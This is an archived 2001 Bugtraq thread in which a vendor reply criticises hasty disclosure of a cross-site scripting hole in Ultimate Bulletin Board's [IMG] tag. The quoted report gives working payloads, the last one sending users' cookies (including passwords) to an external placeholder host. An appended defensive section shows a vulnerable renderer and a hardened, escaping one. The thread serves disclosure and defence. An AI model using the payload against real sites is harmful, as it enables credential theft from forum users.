Bugtraq mailing list archives

Re: Ultimate Bulletin Board


From: Charles Capps <capps () SOLARECLIPSE NET>
Date: Wed, 21 Feb 2001 18:59:13 -0800

This issue has been resolved in version 5.47e, currently available in the
UBB Members Area at Infopop.com

Please note that Mister Ashman gave less than five hours between notifying
Infopop of the security issue and posting this issue to Bugtraq.  The fixed
version was released nearly at the same time as the post to Bugtraq.

Is it not customary to wait until the vendor has not only responded to the
issue but also patched the software and notified its customers before releasing
details concerning a possible exploit?

This arrangement is far superior to simply notifying the vendor and mailing
Bugtraq at the same time, as appears to have been done here.  It allows
possibly at-risk users to patch the problem before it is out in the wild.
--
Charles Capps





----- Original Message -----
From: "Scott Ashman" <sashman () JASPIN COM>
To: <BUGTRAQ () SECURITYFOCUS COM>
Sent: Wednesday, February 21, 2001 14:19
Subject: [BUGTRAQ] Ultimate Bulletin Board


Here is a message I just popped off to infopop about their Ultimate Bulletin
Board v5 product.  It's not really meant for someone not used to their
product.


--------------------------------------------------------------------------------


If a user has info stored in a cookie, replies to a message and is using IE
4.0+, there is a way for a hacker to trap his IP / user name / password /
other cookie information and send them to an external source using your UBB
code with HTML *off*.  There is a way to do this by simply viewing a message
as well, although it's obvious something is going on as it involves a
redirection.  Here's how it works :

Apparently the [img][/img] tag allows non-spaced javascript to run.  You can
write a line like this :

[IMG]test"onerror="alert('test');[/IMG]

This will run the javascript alert when the image 'test' fails to load.

Your cookies can hold both the username and password but are only accessible on
the http://sitename/cgi-bin/ path.  Script running on anything in cgi-path
(replies) can access it.  So
[IMG]test"onerror="alert(document.cookie);[/IMG] will pop up an alert box
with the cookie info on a "reply" page as it's displayed in the thread review
at the bottom.

You can reassign the src of your image (this.src) with document.cookie tacked on
to point to an external page.  The weird thing about imgs and http requests
in general is that your destination does not have to be an image.  So <a
src="www.excite.com/index.html"> will actually try to access index.html.
Hence, you can add actual passable information to an external cgi or
whatever.  On the external page all you need to do is either watch the logs
or have the page itself log any URL variables along with IPs coming in from
the request.

The final line should read something like :
[IMG]test"onerror="this.src='http://xxx.xxx.com/page.cfm?'+escape(document.cookie);[/IMG]

(Pasting this line [no spaces/crlf] in a message means that any user
replying to anything in that thread will cause their cookie to be sent to an
external source)

Scott Ashman
Jaspin Interactive www.jaspin.com
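A defender's illustration of the rendering bug described in the report above, added here and not part of the original thread or of UBB's own code: a naive [IMG] renderer that reproduces the attribute injection, beside a hardened one that only emits an image for a plausible URL and HTML-escapes the attribute value. Function names and the sample URLs are assumptions.

```javascript
// Vulnerable pattern (hypothetical, modelled on the behaviour reported above):
// the tag body is dropped straight into the src attribute, so a body containing
// a double quote closes src and can open a new attribute such as onerror.
function renderImgNaive(text) {
  return text.replace(/\[IMG\]([\s\S]*?)\[\/IMG\]/gi, '<img src="$1">');
}

// Escape the characters that can break out of an HTML attribute or start a tag.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
  })[c]);
}

// Allow-list: an absolute http(s) URL with no quotes, whitespace, brackets or
// parentheses. Anything else is rendered as inert escaped text, not as an image.
const SAFE_IMG_URL = /^https?:\/\/[A-Za-z0-9\-._~:/?#@!$&*+,;=%]+$/;

function renderImgSafe(text) {
  return text.replace(/\[IMG\]([\s\S]*?)\[\/IMG\]/gi, (_, body) => {
    const url = body.trim();
    if (!SAFE_IMG_URL.test(url)) {
      return escapeHtml(body);           // not a URL: show the body as text
    }
    return '<img src="' + escapeHtml(url) + '">';
  });
}

// Constructed inputs: the payload quoted in the report, and a benign image tag.
const PAYLOAD = '[IMG]test"onerror="alert(document.cookie);[/IMG]';
const BENIGN = '[IMG]http://example.com/pic.gif?a=1&b=2[/IMG]';
```

Run through the naive renderer the payload becomes an `<img>` element carrying an `onerror` handler; the hardened renderer never emits a tag for it.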

